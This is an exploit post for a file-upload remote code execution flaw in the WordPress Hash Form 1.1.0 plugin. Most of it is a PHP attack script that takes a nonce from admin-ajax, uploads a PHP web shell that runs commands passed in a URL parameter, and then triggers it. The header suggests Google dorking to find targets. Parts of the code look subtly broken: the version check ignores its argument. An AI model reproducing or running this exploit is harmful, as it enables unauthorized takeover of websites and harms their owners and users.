WordPress Hash Form 1.1.0 Code Injection

=============================================================================================================================================
| # Title : WordPress Hash Form 1.1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://plugintests.com/plugins/wporg/hash-form/latest |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 117 set your target.

[+] Line 111 set your commands.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php

class WordPressHashFormRCE {
private $target_url;
private $nonce;

public function __construct($target_url) {
$this->target_url = $target_url;
}

public function check() {
if (!$this->isWordPressOnline()) {
return ‘WordPress does not appear to be online.’;
}

$plugin_version = $this->checkPluginVersion(‘hash-form’, ‘1.1.1’);

if ($plugin_version === null) {
return ‘Hash Form plugin does not appear to be installed.’;
}

if ($plugin_version === false) {
return ‘Hash Form plugin is installed but the version is unknown.’;
}

if ($plugin_version !== ‘1.1.0’) {
return “Hash Form plugin is version: $plugin_version, which is not vulnerable.”;
}

return “Detected Hash Form plugin version: $plugin_version”;
}

public function exploit() {
echo “Attempting to retrieve nonce from the target…\n”;
$this->nonce = $this->getNonce();

if (!$this->nonce) {
die(‘Failed to retrieve the nonce necessary for file upload.’);
}

echo “Nonce retrieved: {$this->nonce}\n”;
echo “Uploading PHP payload using the retrieved nonce…\n”;

$file_url = $this->uploadPhpFile();
if (!$file_url) {
die(‘Failed to upload the PHP payload. Check file permissions and server settings.’);
}

echo “PHP payload uploaded successfully to $file_url\n”;
$this->triggerPayload($file_url);
}

private function isWordPressOnline() {
$response = $this->sendRequest(‘GET’, ‘/wp-admin/admin-ajax.php?action=hashform_preview&form=1’);
return $response !== false;
}

private function checkPluginVersion($plugin_name, $version) {
$response = $this->sendRequest(‘GET’, “/wp-admin/admin-ajax.php?action=hashform_preview&form=1”);
if ($response === false) return null;

preg_match(‘/”version”:”([^”]+)”/’, $response, $matches);
return $matches[1] ?? false; // return the version or false if not found
}

private function getNonce() {
$response = $this->sendRequest(‘GET’, ‘/wp-admin/admin-ajax.php?action=hashform_preview&form=1’);
if ($response === false) return null;

preg_match(‘/”ajax_nounce”:”([a-f0-9]+)”/’, $response, $matches);
return $matches[1] ?? null;
}

private function uploadPhpFile() {
$file_content = $this->createPayload();
$file_name = strtolower(bin2hex(random_bytes(4))) . ‘.php’;

$response = $this->sendRequest(‘POST’, ‘/wp-admin/admin-ajax.php’, [
‘action’ => ‘hashform_file_upload_action’,
‘file_uploader_nonce’ => $this->nonce,
‘allowedExtensions[0]’ => ‘php’,
‘sizeLimit’ => 1048576,
‘qqfile’ => $file_name,
‘data’ => $file_content
]);

$json_response = json_decode($response, true);
return $json_response[‘url’] ?? null;
}

private function triggerPayload($url) {
echo “Triggering the payload…\n”;
$this->sendRequest(‘GET’, $url);
}

private function sendRequest($method, $uri, $data = []) {
$url = $this->target_url . $uri;
$options = [
‘http’ => [
‘header’ => “Content-Type: application/x-www-form-urlencoded\r\n”,
‘method’ => $method,
‘content’ => http_build_query($data),
],
];
$context = stream_context_create($options);
return @file_get_contents($url, false, $context);
}

private function createPayload() {
// You can define your payload logic here, for now, we return a simple payload
$payload = “<?php\n if(isset(\$_GET[‘cmd’])) { system(\$_GET[‘cmd’]); }\n ?>”;
return base64_encode($payload);
}
}

// استخدام الوحدة
$target_url = ‘http://target-wordpress-site.com’;
$exploit = new WordPressHashFormRCE($target_url);

// تحقق من الثغرة
echo $exploit->check() . “\n”;

// تنفيذ الاستغلال
$exploit->exploit();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================